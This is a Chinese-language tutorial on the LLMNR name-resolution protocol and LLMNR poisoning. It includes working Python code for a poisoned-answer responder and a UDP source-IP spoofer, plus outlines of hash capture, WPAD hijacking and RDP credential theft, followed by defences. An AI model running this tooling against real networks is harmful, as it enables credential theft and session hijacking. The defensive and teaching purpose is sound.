LLMNR协议分析与攻击利用技术详解<\/h1>

0x00 LLMNR简介<\/h2>
LLMNR（Link-Local Multicast Name Resolution）是Windows Vista及后续版本操作系统支持的一种名称解析协议，主要用于局域网中的名称解析。关键特性包括：<\/p>
支持IPv4和IPv6协议<\/li>
在Windows名称解析顺序中仅次于DNS<\/li>
Linux操作系统也已实现LLMNR支持<\/li>
使用UDP协议，监听5355端口<\/li>
IPv4广播地址：224.0.0.252<\/li>
IPv6广播地址：FF02:0:0:0:0:0:1:3或FF02::1:3<\/li> <\/ul>
0x01 LLMNR协议分析<\/h2>
LLMNR协议结构（RFC 4795定义）及各字段说明：<\/p>
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|              ID               |QR| OPCODE  |C|TC|T|Z|Z|Z| RCODE |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            QDCOUNT            |            ANCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            NSCOUNT            |            ARCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
<\/code><\/pre>
字段说明：<\/p>

ID<\/strong>：16位事务ID，随机生成用于标识质询与应答<\/li>
QR<\/strong>：0表示查询，1表示响应<\/li>
OPCODE<\/strong>：4位字段，指定查询类型（标准查询和响应值为0）<\/li>
C<\/strong>：冲突位<\/li>
TC<\/strong>：截断位<\/li>
T<\/strong>：暂定，无标志<\/li>
Z<\/strong>：保留位<\/li>
RCODE<\/strong>：响应码<\/li>
QDCOUNT<\/strong>：16位无符号整数，指定质询部分的条目数量<\/li>
ANCOUNT<\/strong>：16位无符号整数，指定应答部分的资源记录数量<\/li>
NSCOUNT<\/strong>：16位无符号整数，指定权威记录部分的名称服务器资源记录数量<\/li>
ARCOUNT<\/strong>：16位无符号整数，指定附加记录部分的资源记录数量<\/li>
<\/ul>
0x02 LLMNR名称解析过程<\/h2>
完整正常的LLMNR名称解析过程（假设主机B已加入组播组）：<\/p>

主机A向IPv4广播地址224.0.0.252或IPv6广播地址FF02::1:3发送LLMNR查询<\/li>
组播组内所有主机（包括主机B）接收查询<\/li>
主机B识别查询的是自己的主机名，向主机A单播应答<\/li>
主机A收到应答，完成名称解析<\/li>
<\/ol>
关键点：<\/p>

使用UDP协议传输<\/li>
查询类型通过"A"或"AAAA"区分（A=IPv4，AAAA=IPv6）<\/li>
应答包的事务ID(TID)与查询包一致<\/li>
<\/ul>
0x03 LLMNR编程实现<\/h2>
质询实现（Python示例）<\/h3>
import<\/span> socket,<\/span> struct
<\/span><\/span>
<\/span><\/span>class<\/span> LLMNR_Query<\/span>:
<\/span><\/span>    def<\/span> __init__(self,name):
<\/span><\/span>        self.<\/span>name =<\/span> name
<\/span><\/span>        self.<\/span>IsIPv4 =<\/span> True<\/span>
<\/span><\/span>        self.<\/span>populate()
<\/span><\/span>    
<\/span><\/span>    def<\/span> populate<\/span>(self):
<\/span><\/span>        self.<\/span>HOST =<\/span> '224.0.0.252'<\/span> if<\/span> self.<\/span>IsIPv4 else<\/span> 'FF02::1:3'<\/span>
<\/span><\/span>        self.<\/span>PORT =<\/span> 5355<\/span>
<\/span><\/span>        self.<\/span>s_family =<\/span> socket.<\/span>AF_INET if<\/span> self.<\/span>IsIPv4 else<\/span> socket.<\/span>AF_INET6
<\/span><\/span>        self.<\/span>QueryType =<\/span> "IPv4"<\/span>
<\/span><\/span>        self.<\/span>lqs =<\/span> socket.<\/span>socket(self.<\/span>s_family, socket.<\/span>SOCK_DGRAM)
<\/span><\/span>        
<\/span><\/span>        self.<\/span>QueryData =<\/span> (
<\/span><\/span>            "<\/span>\xa9\xfb<\/span>"<\/span>   # Transaction ID<\/span>
<\/span><\/span>            "<\/span>\x00\x00<\/span>"<\/span>   # Flags Query(0x0000)? or Response(0x8000)?<\/span>
<\/span><\/span>            "<\/span>\x00\x01<\/span>"<\/span>   # Question<\/span>
<\/span><\/span>            "<\/span>\x00\x00<\/span>"<\/span>   # Answer RRS<\/span>
<\/span><\/span>            "<\/span>\x00\x00<\/span>"<\/span>   # Authority RRS<\/span>
<\/span><\/span>            "<\/span>\x00\x00<\/span>"<\/span>   # Additional RRS<\/span>
<\/span><\/span>            "LENGTH"<\/span>     # length of Name<\/span>
<\/span><\/span>            "NAME"<\/span>       # Name<\/span>
<\/span><\/span>            "<\/span>\x00<\/span>"<\/span>       # NameNull<\/span>
<\/span><\/span>            "TYPE"<\/span>       # Query Type ,IPv4(0x0001)? or IPv6(0x001c)?<\/span>
<\/span><\/span>            "<\/span>\x00\x01<\/span>"<\/span>)  # Class<\/span>
<\/span><\/span>        
<\/span><\/span>        namelen =<\/span> len(self.<\/span>name)
<\/span><\/span>        self.<\/span>data =<\/span> self.<\/span>QueryData.<\/span>replace('LENGTH'<\/span>, struct.<\/span>pack('>B'<\/span>, namelen))
<\/span><\/span>        self.<\/span>data =<\/span> self.<\/span>data.<\/span>replace('NAME'<\/span>, struct.<\/span>pack(">"<\/span>+<\/span>str(namelen)+<\/span>"s"<\/span>, self.<\/span>name))
<\/span><\/span>        self.<\/span>data =<\/span> self.<\/span>data.<\/span>replace("TYPE"<\/span>, "<\/span>\x00\x01<\/span>"<\/span> if<\/span> self.<\/span>QueryType ==<\/span> "IPv4"<\/span> else<\/span> "<\/span>\x00\x1c<\/span>"<\/span>)
<\/span><\/span>    
<\/span><\/span>    def<\/span> Query<\/span>(self):
<\/span><\/span>        print "LLMNR Querying... -> <\/span>%s<\/span>"<\/span> %<\/span> self.<\/span>name
<\/span><\/span>        self.<\/span>lqs.<\/span>sendto(self.<\/span>data, (self.<\/span>HOST, self.<\/span>PORT))
<\/span><\/span>        self.<\/span>lqs.<\/span>close()
<\/span><\/span><\/code><\/pre>应答实现（Python示例）<\/h3>
import<\/span> socket,<\/span> struct
<\/span><\/span>
<\/span><\/span>class<\/span> LLMNR_Answer<\/span>:
<\/span><\/span>    def<\/span> __init__(self, addr):
<\/span><\/span>        self.<\/span>IPADDR =<\/span> addr
<\/span><\/span>        self.<\/span>las =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_DGRAM)
<\/span><\/span>        self.<\/span>init_socket()
<\/span><\/span>        self.<\/span>populate()
<\/span><\/span>    
<\/span><\/span>    def<\/span> populate<\/span>(self):
<\/span><\/span>        self.<\/span>AnswerData =<\/span> (
<\/span><\/span>            "TID"<\/span>        # Tid<\/span>
<\/span><\/span>            "<\/span>\x80\x00<\/span>"<\/span>   # Flags Query(0x0000)? or Response(0x8000)?<\/span>
<\/span><\/span>            "<\/span>\x00\x01<\/span>"<\/span>   # Question<\/span>
<\/span><\/span>            "<\/span>\x00\x01<\/span>"<\/span>   # Answer RRS<\/span>
<\/span><\/span>            "<\/span>\x00\x00<\/span>"<\/span>   # Authority RRS<\/span>
<\/span><\/span>            "<\/span>\x00\x00<\/span>"<\/span>   # Additional RRS<\/span>
<\/span><\/span>            "LENGTH"<\/span>     # Question Name Length<\/span>
<\/span><\/span>            "NAME"<\/span>       # Question Name<\/span>
<\/span><\/span>            "<\/span>\x00<\/span>"<\/span>       # Question Name Null<\/span>
<\/span><\/span>            "<\/span>\x00\x01<\/span>"<\/span>   # Query Type ,IPv4(0x0001)? or IPv6(0x001c)?<\/span>
<\/span><\/span>            "<\/span>\x00\x01<\/span>"<\/span>   # Class<\/span>
<\/span><\/span>            "LENGTH"<\/span>     # Answer Name Length<\/span>
<\/span><\/span>            "NAME"<\/span>       # Answer Name<\/span>
<\/span><\/span>            "<\/span>\x00<\/span>"<\/span>       # Answer Name Null<\/span>
<\/span><\/span>            "<\/span>\x00\x01<\/span>"<\/span>   # Answer Type ,IPv4(0x0001)? or IPv6(0x001c)?<\/span>
<\/span><\/span>            "<\/span>\x00\x01<\/span>"<\/span>   # Class<\/span>
<\/span><\/span>            "<\/span>\x00\x00\x00\x1e<\/span>"<\/span>  # TTL Default:30s<\/span>
<\/span><\/span>            "<\/span>\x00\x04<\/span>"<\/span>   # IP Length<\/span>
<\/span><\/span>            "IPADDR"<\/span>)    # IP Address<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> init_socket<\/span>(self):
<\/span><\/span>        self.<\/span>HOST =<\/span> "0.0.0.0"<\/span>
<\/span><\/span>        self.<\/span>PORT =<\/span> 5355<\/span>
<\/span><\/span>        self.<\/span>MulADDR =<\/span> "224.0.0.252"<\/span>
<\/span><\/span>        self.<\/span>las.<\/span>setsockopt(socket.<\/span>SOL_SOCKET, socket.<\/span>SO_REUSEADDR, 1<\/span>)
<\/span><\/span>        self.<\/span>las.<\/span>setsockopt(socket.<\/span>IPPROTO_IP, socket.<\/span>IP_MULTICAST_TTL, 255<\/span>)
<\/span><\/span>        self.<\/span>las.<\/span>setsockopt(socket.<\/span>IPPROTO_IP, socket.<\/span>IP_ADD_MEMBERSHIP, 
<\/span><\/span>                           socket.<\/span>inet_aton(self.<\/span>MulADDR) +<\/span> socket.<\/span>inet_aton(self.<\/span>HOST))
<\/span><\/span>    
<\/span><\/span>    def<\/span> Answser<\/span>(self):
<\/span><\/span>        self.<\/span>las.<\/span>bind((self.<\/span>HOST, self.<\/span>PORT))
<\/span><\/span>        print "Listening..."<\/span>
<\/span><\/span>        while<\/span> True<\/span>:
<\/span><\/span>            data, addr =<\/span> self.<\/span>las.<\/span>recvfrom(1024<\/span>)
<\/span><\/span>            tid =<\/span> data[0<\/span>:2<\/span>]
<\/span><\/span>            namelen =<\/span> struct.<\/span>unpack('>B'<\/span>, data[12<\/span>])[0<\/span>]
<\/span><\/span>            name =<\/span> data[13<\/span>:13<\/span> +<\/span> namelen]
<\/span><\/span>            
<\/span><\/span>            data =<\/span> self.<\/span>AnswerData.<\/span>replace('TID'<\/span>, tid)
<\/span><\/span>            data =<\/span> data.<\/span>replace('LENGTH'<\/span>, struct.<\/span>pack('>B'<\/span>, namelen))
<\/span><\/span>            data =<\/span> data.<\/span>replace('NAME'<\/span>, name)
<\/span><\/span>            data =<\/span> data.<\/span>replace('IPADDR'<\/span>, socket.<\/span>inet_aton(self.<\/span>IPADDR))
<\/span><\/span>            
<\/span><\/span>            print "Poisoned answer(<\/span>%s<\/span>) sent to <\/span>%s<\/span> for name <\/span>%s<\/span> "<\/span> %<\/span> (self.<\/span>IPADDR, addr[0<\/span>], name)
<\/span><\/span>            self.<\/span>las.<\/span>sendto(data, addr)
<\/span><\/span><\/code><\/pre>0x04 LLMNR Poison攻击原理<\/h2>
攻击原理：<\/p>

攻击者加入LLMNR组播组<\/li>
当有主机发起LLMNR名称解析查询时<\/li>
攻击者抢先对查询进行恶意应答<\/li>
受害者主机接受攻击者的应答，将流量导向攻击者指定IP<\/li>
<\/ol>
关键缺陷：<\/p>

LLMNR使用无连接的UDP协议<\/li>
无论请求的主机名是否存在，都会进行LLMNR解析<\/li>
默认情况下Windows系统启用LLMNR<\/li>
<\/ul>
0x05 伪造源IP+LLMNR Poison攻击<\/h2>
利用UDP无连接特性伪造源IP进行攻击：<\/p>

攻击者伪造受害者IP向广播地址发送LLMNR查询<\/li>
攻击者自己对该查询进行应答<\/li>
受害者主机会将指定主机名的访问重定向到攻击者指定IP<\/li>
<\/ol>
伪造UDP源IP示例代码：<\/p>
import<\/span> socket,<\/span> time
<\/span><\/span>from<\/span> impacket import<\/span> ImpactDecoder, ImpactPacket
<\/span><\/span>
<\/span><\/span>def<\/span> UDPSpoof<\/span>(src_ip, src_port, dst_ip, dst_port, data):
<\/span><\/span>    ip =<\/span> ImpactPacket.<\/span>IP()
<\/span><\/span>    ip.<\/span>set_ip_src(src_ip)
<\/span><\/span>    ip.<\/span>set_ip_dst(dst_ip)
<\/span><\/span>    
<\/span><\/span>    udp =<\/span> ImpactPacket.<\/span>UDP()
<\/span><\/span>    udp.<\/span>set_uh_sport(src_port)
<\/span><\/span>    udp.<\/span>set_uh_dport(dst_port)
<\/span><\/span>    udp.<\/span>contains(ImpactPacket.<\/span>Data(data))
<\/span><\/span>    
<\/span><\/span>    ip.<\/span>contains(udp)
<\/span><\/span>    s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_RAW, socket.<\/span>IPPROTO_UDP)
<\/span><\/span>    s.<\/span>setsockopt(socket.<\/span>IPPROTO_IP, socket.<\/span>IP_HDRINCL, 1<\/span>)
<\/span><\/span>    s.<\/span>sendto(ip.<\/span>get_packet(), (dst_ip, dst_port))
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    QueryData =<\/span> (
<\/span><\/span>        "<\/span>\xa9\xfb<\/span>"<\/span>   # Transaction ID<\/span>
<\/span><\/span>        "<\/span>\x00\x00<\/span>"<\/span>   # Flags <\/span>
<\/span><\/span>        "<\/span>\x00\x01<\/span>"<\/span>   # Question<\/span>
<\/span><\/span>        "<\/span>\x00\x00<\/span>"<\/span>   # Answer RRS<\/span>
<\/span><\/span>        "<\/span>\x00\x00<\/span>"<\/span>   # Authority RRS<\/span>
<\/span><\/span>        "<\/span>\x00\x00<\/span>"<\/span>   # Additional RRS<\/span>
<\/span><\/span>        "<\/span>\x09<\/span>"<\/span>       # length of Name<\/span>
<\/span><\/span>        "Her0in-PC"<\/span>  # Name<\/span>
<\/span><\/span>        "<\/span>\x00<\/span>"<\/span>       # NameNull<\/span>
<\/span><\/span>        "<\/span>\x00\x01<\/span>"<\/span>   # Query Type<\/span>
<\/span><\/span>        "<\/span>\x00\x01<\/span>"<\/span>)  # Class<\/span>
<\/span><\/span>    
<\/span><\/span>    ip_src =<\/span> "192.168.169.1"<\/span>
<\/span><\/span>    ip_dst =<\/span> "224.0.0.252"<\/span>
<\/span><\/span>    
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        print("UDP Source IP Spoof <\/span>%s<\/span> => <\/span>%s<\/span> for Her0in-PC"<\/span> %<\/span> (ip_src, ip_dst))
<\/span><\/span>        UDPSpoof(ip_src, 18743<\/span>, ip_dst, 5355<\/span>, QueryData)
<\/span><\/span>        time.<\/span>sleep(3<\/span>)
<\/span><\/span><\/code><\/pre>攻击效果：<\/p>

受害者访问任何使用主机名的服务都会被重定向<\/li>
可劫持SMB、HTTP、RDP等各种服务会话<\/li>
<\/ul>
0x06 LLMNR Poison实战攻击思路<\/h2>
1. 劫持会话获取HASH<\/h3>
SMB会话劫持：<\/strong><\/p>

当主机使用计算机名访问共享时<\/li>
攻击者可获取发起请求主机的NTLMv2 HASH<\/li>
可用于离线爆破（无法直接用于Pass-the-Hash）<\/li>
<\/ul>
HTTP 401认证获取HASH：<\/strong><\/p>

通过嵌入恶意标签触发LLMNR请求：

<\/span><\/span>或
<\/span><\/span>
<\/span><\/span><\/code><\/pre><\/li>
受害者访问网页后会自动发起LLMNR请求<\/li>
攻击者获取HTTP 401认证的HASH<\/li>
<\/ul>
2. 劫持会话进行钓鱼<\/h3>

设置伪造的HTTP 401认证服务器<\/li>
诱导用户输入凭据<\/li>
获取明文用户名和密码<\/li>
<\/ul>
3. 劫持WPAD获取上网记录<\/h3>
攻击步骤：<\/p>

利用LLMNR Poison劫持WPAD名称解析<\/li>
修改受害者主机的浏览器代理设置<\/li>
通过攻击者的代理服务器：

查看受害者上网记录<\/li>
注入恶意脚本<\/li>
通过Windows更新分发恶意软件<\/li>
<\/ul>
<\/li>
<\/ol>
4. "剑走偏锋"获取服务器密码<\/h3>
攻击场景：<\/p>

管理员通过RDP连接内网服务器<\/li>
攻击者利用LLMNR Poison劫持3389会话<\/li>
将RDP连接重定向到攻击者控制的服务器<\/li>
记录管理员输入的凭据<\/li>
<\/ol>
0x07 防御措施<\/h2>
关闭LLMNR的注册表设置：<\/p>
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient"<\/span> \/v EnableMulticast \/t REG_DWORD \/d 0 \/f
<\/span><\/span>reg add "HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\DNSClient"<\/span> \/v EnableMulticast \/t REG_DWORD \/d 0 \/f
<\/span><\/span><\/code><\/pre>其他防御建议：<\/p>

在网络设备上阻止LLMNR流量（UDP 5355）<\/li>
使用主机防火墙限制组播流量<\/li>
确保所有主机都有正确的DNS记录，减少LLMNR使用<\/li>
教育用户不要使用主机名访问重要资源<\/li>
<\/ul>